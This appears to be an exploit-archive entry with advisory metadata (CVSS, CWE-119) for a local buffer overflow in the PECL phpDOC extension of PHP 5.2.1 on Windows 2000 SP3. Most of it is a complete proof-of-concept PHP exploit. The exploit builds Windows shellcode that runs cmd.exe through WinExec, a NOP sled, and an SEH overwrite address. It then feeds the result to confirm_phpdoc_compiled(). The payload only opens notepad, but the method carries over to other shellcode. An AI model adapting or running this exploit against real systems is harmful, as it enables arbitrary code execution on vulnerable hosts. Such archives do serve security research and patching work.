PHP 5.2.1 with PECL phpDOC local buffer overflow

2007.04.04
Credit: rgod
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 4.3/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.1/10
Exploit range: Local
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php
// PHP 5.2.1 with PECL phpDOC confirm_phpdoc_compiled() local buffer overflow poc exploit
// WIN 2K SP3 version / seh overwrite method
// to be launched from the cli
// by rgod
// site: http://retrogod.altervista.org

if (!extension_loaded("phpDOC")) {
    die("you need the phpDOC extension loaded.");
}

// payload: runs "cmd.exe /c start notepad &" through WinExec, then calls ExitProcess
$____scode =
    "\xeb\x1b" .
    "\x5b" .
    "\x31\xc0" .
    "\x50" .
    "\x31\xc0" .
    "\x88\x43\x59" .
    "\x53" .
    "\xbb\xca\x73\xe9\x77" . // WinExec
    "\xff\xd3" .
    "\x31\xc0" .
    "\x50" .
    "\xbb\x5c\xcf\xe9\x77" . // ExitProcess
    "\xff\xd3" .
    "\xe8\xe0\xff\xff\xff" .
    "\x63\x6d\x64" .
    "\x2e" .
    "\x65" .
    "\x78\x65" .
    "\x20\x2f" .
    "\x63\x20" .
    "start notepad & ";

// eip & ecx set to the same value ...
$eip = "\x47\x30\xE9\x77"; // 0x77E93047 pop ECX - pop - ret bis kernel32.dll
// and further (junk...) inc edi, xor cl ch, *ja short*
// should work on sp4 if you find a usable address

// 1393 bytes of nop sled + payload, 30 nops, the overwrite address, then 12 trailing nops
$____suntzu = str_repeat("\x90", 1393 - strlen($____scode)) . $____scode
    . str_repeat("\x90", 30) . $eip . str_repeat("\x90", 12);

confirm_phpdoc_compiled($____suntzu);
?>

original url: http://retrogod.altervista.org/php521_phpdoc_bof.html


Copyright 2019, cxsecurity.com